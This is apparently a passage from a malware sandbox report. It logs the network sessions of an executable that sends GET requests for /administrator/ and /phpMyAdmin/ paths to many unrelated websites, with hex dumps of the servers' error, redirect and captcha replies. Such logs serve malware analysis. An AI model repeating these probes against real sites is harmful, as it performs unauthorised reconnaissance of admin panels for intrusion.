                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    68192.168.2.45564992.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.392446995 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: bunasta.eu
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.593775988 CET585INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                    Location: https://bunasta.eu/administrator/
                                                                                                                                                                                                    Content-Length: 317
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 6e 61 73 74 61 2e 65 75 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 75 6e 61 73 74 61 2e 65 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bunasta.eu/administrator/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at bunasta.eu Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    69192.168.2.4559073.234.162.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.394448996 CET224OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: t1eng.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.488738060 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                    content-length: 1238
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.488754034 CET281INData Raw: 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61
                                                                                                                                                                                                    Data Ascii: www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    70192.168.2.45587935.237.190.156806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.394725084 CET229OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: krkconcord.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.660938978 CET447INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Keep-Alive: timeout=20
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:31 GMT
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    X-Redirect-By: redirection
                                                                                                                                                                                                    Location: https://kidsrkids.com/concord/phpMyAdmin/
                                                                                                                                                                                                    X-Powered-By: WP Engine
                                                                                                                                                                                                    X-Pass-Why: custom-path


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    71192.168.2.45556813.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.417962074 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: srmist.edu.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.707716942 CET1340INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                    Server: awselb/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Length: 2051
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    x-amzn-waf-action: captcha
                                                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 75 6d 61 6e 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 41 72 69 61 6c 22 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 77 73 57 61 66 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 4c 69 73 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 67 6f 6b 75 50 72 6f 70 73 20 3d 20 7b 0a 22 6b 65 79 22 3a 22 41 51 49 44 41 48 6a 63 59 75 2f 47 6a 58 2b 51 6c 67 68 69 63 42 67 51 2f 37 62 46 61 51 5a 2b 6d 35 46 4b 43 4d 44 6e 4f 2b 76 54 62 4e 67 39 36 41 46 34 6e 42 4c 62 4c 41 66 34 42 63 63 58 76 47 4c 61 46 43 62 69 41 41 41 41 66 6a 42 38 42 67 6b 71 68 6b 69 47 39 77 30 42 42 77 61 67 62 7a 42 74 41 67 45 41 4d 47 67 47 43 53 71 47 53 49 62 33 44 51 45 48 41 54 41 65 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 53 34 77 45 51 51 4d 33 6a 7a 69 7a 57 69 33 7a 5a 65 49 65 73 63 49 41 67 45 51 67 44 74 6d 54 4c 35 56 5a 2f 62 41 50 6a 55 5a 47 47 4d 76 6e 48 70 35 75 72 49 71 64 4f 43 6e 43 6b 31 64 57 6b 77 4e 6c 64 67 6b 56 46 75 73 63 57 76 46 2b 76 56 31 2f 72 79 4e 57 4a 6d 45 63 74 4d 56 31 61 70 56 53 55 72 6b 63 39 39 35 30 51 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 69 76 22 3a 22 43 67 41 45 35 77 7a 48 61 4e 41 41 41 41 4b 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 74 65 78 74 22 3a 22 2b 71 45 74 67 54 58 43 30 4e 53 76 49 2f 46 35 30 48 39 38 35 6c 72 73 6a 37 63 67 58 6d 45 41 38 34 66 46 65 4a 37 6b 69 2f 37 31 74 75 2b 38 6f 2f 59 73 32 66 64 45 51 53 54 42 6b 63 6a 35 6f 73 38 41 30 44 78 46 43 30 2f 73 71 57 73 75 6a 2b 62 55 76 30 7a 73 53 43 57 37 6c 43 68 5a 68 6d 4f 46 46 68 79 7a 63 7a 44 5a 6b 4f 69 6a 4a 53 6c 48 70 38 30 69 4f 6d 33 68 68 4f 38 73 35 79 76 54 6f 2f 54 70 59 73 77 4f 68 46 4c 39 32 38 50 62 59 61 75 34 59 34 6f 35 33 67 78 38 39 49 7a 46 35 35 41 58 72 4d 67 72 77 67 51 61 58 37 50 61 67 44 7a 67 50 30 6d 66 4b 68 46 76 47 74 74 74 4a 39 30 74 58 38 6e 78 44 7a 61 7a 58 4f 30 52 48 51 58 47 69 57 70 75 75 48 74 4b 30 72 47 35 54 78 59 41 53 6a 78 34 70 52 79 70 49 50 7a 73 41 50 65 36 63 52 53 6d 58 37 33 2f 34 48 78 51 4e 70 4e 70 39 78 43 67 5a 65 51 63 46 43 4a 33 4e 4b 42 44 61 43 39 70 70 65 61 30 57 33 4c 70 58 76 51 66 55 2b 4e 69 6e 71 32 66 78 4f 6d 6d 2f 35 30 44 50 55 70 34 52 30 69 50 4f 38 76 70 49 53 66 58 75 68 64 59 36 43 4e 6c 57 79 49 33 74 59 51 53 35 36 68 51 74 65 4b 70 6d 4b 30 6b 62 50 65 65 4f 59 45 3d 22 0a 7d 3b 0a 20 20 20 20 3c
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Human Verification</title> <style> body { font-family: "Arial"; } </style> <script type="text/javascript"> window.awsWafCookieDomainList = []; window.gokuProps = {"key":"AQIDAHjcYu/GjX+QlghicBgQ/7bFaQZ+m5FKCMDnO+vTbNg96AF4nBLbLAf4BccXvGLaFCbiAAAAfjB8BgkqhkiG9w0BBwagbzBtAgEAMGgGCSqGSIb3DQEHATAeBglghkgBZQMEAS4wEQQM3jzizWi3zZeIescIAgEQgDtmTL5VZ/bAPjUZGGMvnHp5urIqdOCnCk1dWkwNldgkVFuscWvF+vV1/ryNWJmEctMV1apVSUrkc9950Q==", "iv":"CgAE5wzHaNAAAAK0", "context":"+qEtgTXC0NSvI/F50H985lrsj7cgXmEA84fFeJ7ki/71tu+8o/Ys2fdEQSTBkcj5os8A0DxFC0/sqWsuj+bUv0zsSCW7lChZhmOFFhyzczDZkOijJSlHp80iOm3hhO8s5yvTo/TpYswOhFL928PbYau4Y4o53gx89IzF55AXrMgrwgQaX7PagDzgP0mfKhFvGtttJ90tX8nxDzazXO0RHQXGiWpuuHtK0rG5TxYASjx4pRypIPzsAPe6cRSmX73/4HxQNpNp9xCgZeQcFCJ3NKBDaC9ppea0W3LpXvQfU+Ninq2fxOmm/50DPUp4R0iPO8vpISfXuhdY6CNlWyI3tYQS56hQteKpmK0kbPeeOYE="}; <
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.707756042 CET1054INData Raw: 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 33 38 63 39 31 33 66 35 39 64 66 66 2e 32 64 64 32 30 38 30 66 2e 61 70 2d 73 6f 75 74 68 2d 31 2e 74 6f 6b 65 6e 2e 61 77 73 77 61 66 2e 63 6f
                                                                                                                                                                                                    Data Ascii: /script> <script src="https://38c913f59dff.2dd2080f.ap-south-1.token.awswaf.com/38c913f59dff/5b5c81627d9b/f3e3dd915a24/challenge.js"></script> <script src="https://38c913f59dff.2dd2080f.ap-south-1.captcha.awswaf.com/38c913f59dff/5b5c81
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.709340096 CET286OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: srmist.edu.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://srmist.edu.in/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.999752998 CET1340INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                    Server: awselb/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Length: 2051
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    x-amzn-waf-action: captcha
                                                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 75 6d 61 6e 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 41 72 69 61 6c 22 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 77 73 57 61 66 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 4c 69 73 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 67 6f 6b 75 50 72 6f 70 73 20 3d 20 7b 0a 22 6b 65 79 22 3a 22 41 51 49 44 41 48 6a 63 59 75 2f 47 6a 58 2b 51 6c 67 68 69 63 42 67 51 2f 37 62 46 61 51 5a 2b 6d 35 46 4b 43 4d 44 6e 4f 2b 76 54 62 4e 67 39 36 41 46 34 6e 42 4c 62 4c 41 66 34 42 63 63 58 76 47 4c 61 46 43 62 69 41 41 41 41 66 6a 42 38 42 67 6b 71 68 6b 69 47 39 77 30 42 42 77 61 67 62 7a 42 74 41 67 45 41 4d 47 67 47 43 53 71 47 53 49 62 33 44 51 45 48 41 54 41 65 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 53 34 77 45 51 51 4d 33 6a 7a 69 7a 57 69 33 7a 5a 65 49 65 73 63 49 41 67 45 51 67 44 74 6d 54 4c 35 56 5a 2f 62 41 50 6a 55 5a 47 47 4d 76 6e 48 70 35 75 72 49 71 64 4f 43 6e 43 6b 31 64 57 6b 77 4e 6c 64 67 6b 56 46 75 73 63 57 76 46 2b 76 56 31 2f 72 79 4e 57 4a 6d 45 63 74 4d 56 31 61 70 56 53 55 72 6b 63 39 39 35 30 51 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 69 76 22 3a 22 43 67 41 41 30 41 79 76 32 6f 41 41 41 41 34 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 74 65 78 74 22 3a 22 77 62 4c 67 44 6f 36 50 71 2f 74 4e 48 2b 77 4f 4a 78 35 4d 7a 47 72 48 72 4e 71 76 2f 35 77 70 72 6a 6d 6f 63 4b 63 50 50 56 5a 4d 41 52 6a 36 63 64 56 73 73 71 72 31 47 71 5a 42 6f 62 43 65 38 43 36 71 75 59 42 6a 49 75 66 62 51 6f 36 63 49 64 33 4c 49 4b 69 77 69 49 6e 72 4c 7a 2b 72 43 41 67 68 53 39 30 61 71 43 7a 33 4a 72 42 50 77 6d 39 55 41 71 6c 66 6e 65 4a 33 39 56 49 30 49 70 76 6d 64 4d 74 7a 35 49 57 6f 55 32 73 52 53 45 75 5a 78 34 53 76 58 39 46 45 2b 33 48 44 78 78 59 61 76 7a 4f 2f 6a 6a 37 50 51 51 54 76 7a 36 34 7a 6f 52 42 6a 50 45 65 6a 47 6f 48 7a 71 54 2b 56 43 6d 2f 50 76 53 67 64 77 74 4c 61 4c 67 55 59 79 39 34 4c 43 7a 44 62 65 34 34 76 67 5a 59 39 69 53 72 50 43 7a 6e 51 74 35 4f 34 6b 47 68 6b 46 4c 32 69 75 79 47 6a 2b 75 63 31 44 58 32 2b 6f 4d 7a 75 2f 4c 47 75 6e 4e 6c 31 54 6c 74 67 36 6e 4e 55 51 6c 30 35 68 41 6e 75 63 4f 62 71 6f 78 77 68 2b 59 64 55 75 6f 5a 57 66 57 45 36 47 70 69 42 76 6c 37 36 77 6c 58 56 47 54 71 6a 30 2b 61 49 66 4c 6e 41 5a 4f 54 4f 4f 39 6e 61 71 79 43 50 69 73 37 6b 51 49 6e 6a 78 5a 6f 59 37 36 4c 2f 5a 55 51 3d 22 0a 7d 3b 0a 20 20 20 20 3c
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Human Verification</title> <style> body { font-family: "Arial"; } </style> <script type="text/javascript"> window.awsWafCookieDomainList = []; window.gokuProps = {"key":"AQIDAHjcYu/GjX+QlghicBgQ/7bFaQZ+m5FKCMDnO+vTbNg96AF4nBLbLAf4BccXvGLaFCbiAAAAfjB8BgkqhkiG9w0BBwagbzBtAgEAMGgGCSqGSIb3DQEHATAeBglghkgBZQMEAS4wEQQM3jzizWi3zZeIescIAgEQgDtmTL5VZ/bAPjUZGGMvnHp5urIqdOCnCk1dWkwNldgkVFuscWvF+vV1/ryNWJmEctMV1apVSUrkc9950Q==", "iv":"CgAA0Ayv2oAAAA46", "context":"wbLgDo6Pq/tNH+wOJx5MzGrHrNqv/5wprjmocKcPPVZMARj6cdVssqr1GqZBobCe8C6quYBjIufbQo6cId3LIKiwiInrLz+rCAghS90aqCz3JrBPwm9UAqlfneJ39VI0IpvmdMtz5IWoU2sRSEuZx4SvX9FE+3HDxxYavzO/jj7PQQTvz64zoRBjPEejGoHzqT+VCm/PvSgdwtLaLgUYy94LCzDbe44vgZY9iSrPCznQt5O4kGhkFL2iuyGj+uc1DX2+oMzu/LGunNl1Tltg6nNUQl05hAnucObqoxwh+YdUuoZWfWE6GpiBvl76wlXVGTqj0+aIfLnAZOTOO9naqyCPis7kQInjxZoY76L/ZUQ="}; <
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.999771118 CET1054INData Raw: 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 33 38 63 39 31 33 66 35 39 64 66 66 2e 32 64 64 32 30 38 30 66 2e 61 70 2d 73 6f 75 74 68 2d 31 2e 74 6f 6b 65 6e 2e 61 77 73 77 61 66 2e 63 6f
                                                                                                                                                                                                    Data Ascii: /script> <script src="https://38c913f59dff.2dd2080f.ap-south-1.token.awswaf.com/38c913f59dff/5b5c81627d9b/f3e3dd915a24/challenge.js"></script> <script src="https://38c913f59dff.2dd2080f.ap-south-1.captcha.awswaf.com/38c913f59dff/5b5c81


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    72192.168.2.45582489.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.419913054 CET284OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: viidelta.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
